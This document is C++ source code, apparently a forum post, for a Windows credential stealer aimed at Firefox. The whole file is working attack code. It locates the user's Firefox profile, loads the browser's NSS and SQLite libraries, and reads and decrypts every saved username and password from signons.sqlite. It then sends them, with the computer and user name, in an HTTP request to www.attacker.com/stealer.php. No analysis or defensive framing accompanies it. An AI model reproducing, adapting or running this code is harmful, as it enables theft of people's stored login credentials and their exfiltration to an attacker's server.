[cpp]#include <Windows.h>
#include <WinInet.h>
#define HOST "www.attacker.com"
#define PORT 80
#define PAGE_NAME "stealer.php"
char * getProfilePath()
{
DWORD dwBytesRead = 0;
char ReadBuffer[513] = {0};
char* appDataStr = (char*)malloc(256*sizeof(char));
int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 );
char* iniFile;
iniFile = (char*)malloc(512*sizeof(char*));
ZeroMemory(iniFile,512);
//strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini");
strcat((char*)appDataStr,"\\Mozilla\\Firefox\\Profiles\\*");
strcat((char*)iniFile,(char*)appDataStr);
HANDLE handle;
WIN32_FIND_DATA information;
handle = FindFirstFileExA(iniFile,FindExInfoStandard,&information,FindExSearchLimitToDirectories,NULL,0);
if( handle != INVALID_HANDLE_VALUE)
{
for(int i = 0; i <3; i=i+1)
{
FindNextFile(handle,&information);
}
}
char *realPath;
realPath = (char*)malloc(1024*sizeof(char));
ZeroMemory(realPath,1024*sizeof(char));
strncat(realPath,iniFile,strlen(iniFile)-1);
strcat(realPath,(char*)information.cFileName);
return realPath;
}
void Request (const char* server,const char* input)
{
HINTERNET hInternet;
HINTERNET hConnect;
HINTERNET hRequest;
hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE);
if (hInternet != NULL)
{
hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u);
if (hConnect != NULL)
{
hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1);
if (hRequest != NULL)
{
HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0);
}
}
}
InternetCloseHandle(hInternet);
InternetCloseHandle(hConnect);
InternetCloseHandle(hRequest);
}
char* getComputerName()
{
DWORD computerNameSize = 512;
char* computerName;
computerName = (char*)malloc(512*sizeof(char));
GetComputerNameA(computerName, &computerNameSize);
DWORD UserNameSize = 512;
char* userName;
userName = (char*)malloc(512*sizeof(char));
GetUserNameA(userName, &UserNameSize);
char* fullComputerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(fullComputerName,1024*sizeof(char));
strcat(fullComputerName,(const char*)computerName);
strcat(fullComputerName,userName);
return fullComputerName;
}
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
typedef int (_cdecl *sqlite3_open)(
const char *filename, /* Database filename (UTF-8) */
sqlite3 **ppDb /* OUT: SQLite db handle */
);
typedef int (_cdecl *sqlite3_prepare_v2)(
sqlite3 *db, /* Database handle */
const char *zSql, /* SQL statement, UTF-8 encoded */
int nByte, /* Maximum length of zSql in bytes. */
sqlite3_stmt **ppStmt, /* OUT: Statement handle */
const char **pzTail /* OUT: Pointer to unused portion of zSql */
);
typedef int (_cdecl *sqlite3_close)(sqlite3 *);
typedef int (_cdecl *sqlite3_step)(sqlite3_stmt *);
typedef const unsigned char * (_cdecl *sqlite3_column_text)(sqlite3_stmt *, int iCol);
typedef enum _SECItemType{
siBuffer = 0,
siClearDataBuffer = 1,
siCipherDataBuffer = 2,
siDERCertBuffer = 3,
siEncodedCertBuffer = 4,
siDERNameBuffer = 5,
siEncodedNameBuffer = 6,
siAsciiNameString = 7,
siAsciiString = 8,
siDEROID = 9,
siUnsignedInteger = 10,
siUTCTime = 11,
siGeneralizedTime = 12
} SECItemType;
typedef struct _SECItem
{
SECItemType type;
unsigned char *data;
unsigned int len;
} SECItem;
typedef enum _SECStatus
{
SECWouldBlock = -2,
SECFailure = -1,
SECSuccess = 0
} SECStatus;
typedef struct PRArenaPool PRArenaPool;
typedef SECStatus (CDECL *NSS_Init)(const char *configdir);
typedef DWORD * (CDECL *PK11_GetInternalKeySlot) (void);
typedef SECStatus (CDECL *PK11_Authenticate)(DWORD *slot, int loadCerts, void *wincx);
typedef SECStatus (CDECL *PK11SDR_Decrypt)(SECItem *data, SECItem *result, void *cx);
typedef void (CDECL *PK11_FreeSlot)(DWORD *slot);
typedef SECStatus (CDECL *NSS_Shutdown)(void);
typedef SECItem * (CDECL *NSSBase64_DecodeBuffer)(PRArenaPool *arenaOpt, SECItem *outItemOpt, const char *inStr, unsigned int inLen);
int main()
{
NSS_Init _NSS_Init;
PK11_GetInternalKeySlot _PK11_GetInternalKeySlot;
PK11_Authenticate _PK11_Authenticate;
NSSBase64_DecodeBuffer _NSSBase64_DecodeBuffer;
PK11SDR_Decrypt _PK11SDR_Decrypt;
PK11_FreeSlot _PK11_FreeSlot;
NSS_Shutdown _NSS_Shutdown;
sqlite3_open _sqlite3_open;
sqlite3_close _sqlite3_close;
sqlite3_prepare_v2 _sqlite3_prepare_v2;
sqlite3_step _sqlite3_step;
sqlite3_column_text _sqlite3_column_text;
HMODULE mozsqlite3,nss3;
char* path = (char*)malloc(2048*sizeof(char));
ZeroMemory(path,2048*sizeof(char));
int strSize = ExpandEnvironmentStringsA("%PROGRAMFILES%",path, 256);
strcat(path,"\\Mozilla Firefox\\");
SetDllDirectoryA(path);
mozsqlite3 = LoadLibraryA("mozsqlite3.dll");
nss3 = LoadLibraryA("nss3.dll");
_NSS_Init = (NSS_Init)GetProcAddress(nss3, "NSS_Init");
_PK11_GetInternalKeySlot = (PK11_GetInternalKeySlot)GetProcAddress(nss3, "PK11_GetInternalKeySlot");
_PK11_Authenticate = (PK11_Authenticate)GetProcAddress(nss3, "PK11_Authenticate");
_NSSBase64_DecodeBuffer = (NSSBase64_DecodeBuffer)GetProcAddress(nss3, "NSSBase64_DecodeBuffer");
_PK11SDR_Decrypt = (PK11SDR_Decrypt)GetProcAddress(nss3, "PK11SDR_Decrypt");
_PK11_FreeSlot = (PK11_FreeSlot)GetProcAddress(nss3, "PK11_FreeSlot");
_NSS_Shutdown = (NSS_Shutdown)GetProcAddress(nss3, "NSS_Shutdown");
_sqlite3_open = (sqlite3_open)GetProcAddress(mozsqlite3, "sqlite3_open");
_sqlite3_close = (sqlite3_close)GetProcAddress(mozsqlite3, "sqlite3_close");
_sqlite3_prepare_v2 = (sqlite3_prepare_v2)GetProcAddress(mozsqlite3, "sqlite3_prepare_v2");
_sqlite3_step = (sqlite3_step)GetProcAddress(mozsqlite3, "sqlite3_step");
_sqlite3_column_text = (sqlite3_column_text)GetProcAddress (mozsqlite3, "sqlite3_column_text");
char* profile;
profile = (char*)malloc(1024*sizeof(char));
ZeroMemory(profile,1024*sizeof(char));
strcpy(profile,(char*)getProfilePath());
char* profile4signons;
profile4signons = (char*)malloc(1024*sizeof(char));
ZeroMemory(profile4signons,1024*sizeof(char));
strcpy(profile4signons,(char*)getProfilePath());
sqlite3 *db; // sqlite3 db struct
sqlite3_stmt *res;
const char *tail;
strcat(profile4signons,"\\signons.sqlite");
char* signons;
signons = (char*)malloc(4096*sizeof(char));
ZeroMemory(signons,4096*sizeof(char));
int error = _sqlite3_open(profile4signons, &db);
if(!error)
{
_sqlite3_prepare_v2(db,"select * from moz_logins",strlen("select * from moz_logins"),&res,&tail);
while(_sqlite3_step(res) == 100)
{
strcat(signons,"username:");
DWORD* keyslot;
if (! _NSS_Init(profile))
{
keyslot = _PK11_GetInternalKeySlot();
if(keyslot)
{
SECItem cryptedSECItem, DecryptedSECItem;
if(!_PK11_Authenticate (keyslot, 1, NULL))
{
cryptedSECItem.data = NULL;
cryptedSECItem.len = NULL;
DecryptedSECItem.data = NULL;
DecryptedSECItem.len = NULL;
bool res2 = _NSSBase64_DecodeBuffer(NULL, &cryptedSECItem, (char*)_sqlite3_column_text(res, 6),strlen((char*)_sqlite3_column_text(res, 6)));
bool res1 = _PK11SDR_Decrypt(&cryptedSECItem, &DecryptedSECItem, NULL);
strcat(signons,(char*)DecryptedSECItem.data);
res2 = false;
res1 = false;
}
}
_PK11_FreeSlot(keyslot);
}
_NSS_Shutdown();
strcat(signons,"-");
strcat(signons,"password:");
DWORD* keyslotPass;
if (! _NSS_Init(profile))
{
keyslotPass = _PK11_GetInternalKeySlot();
if(keyslotPass)
{
SECItem cryptedSECItemPass, DecryptedSECItemPass;
if(!_PK11_Authenticate (keyslotPass, 1, NULL))
{
cryptedSECItemPass.data = NULL;
cryptedSECItemPass.len = NULL;
DecryptedSECItemPass.data = NULL;
DecryptedSECItemPass.len = NULL;
bool res2 = _NSSBase64_DecodeBuffer(NULL, &cryptedSECItemPass, (char*)_sqlite3_column_text(res, 7),strlen((char*)_sqlite3_column_text(res, 7)));
bool res1 = _PK11SDR_Decrypt(&cryptedSECItemPass, &DecryptedSECItemPass, NULL);
strcat(signons,(char*)DecryptedSECItemPass.data);
res2 = false;
res1 = false;
}
}
_PK11_FreeSlot(keyslotPass);
}
_NSS_Shutdown();
strcat(signons,"*-*-*");
}
}
char* computerName;
computerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(computerName,1024*sizeof(char));
computerName = getComputerName();
char *data;
data = (char*)malloc(429496729*sizeof(char));
ZeroMemory(data,429496729*sizeof(char));
strcpy(data,PAGE_NAME);
strcat(data,"?computerName=");
strcat(data,computerName);
strcat(data,"-signons");
strcat(data,"&signons=");
strcat(data,signons);
Request(HOST,data);
_sqlite3_close(db);
FreeLibrary(nss3);
FreeLibrary(mozsqlite3);
free(data);
return 0;
}[/cpp]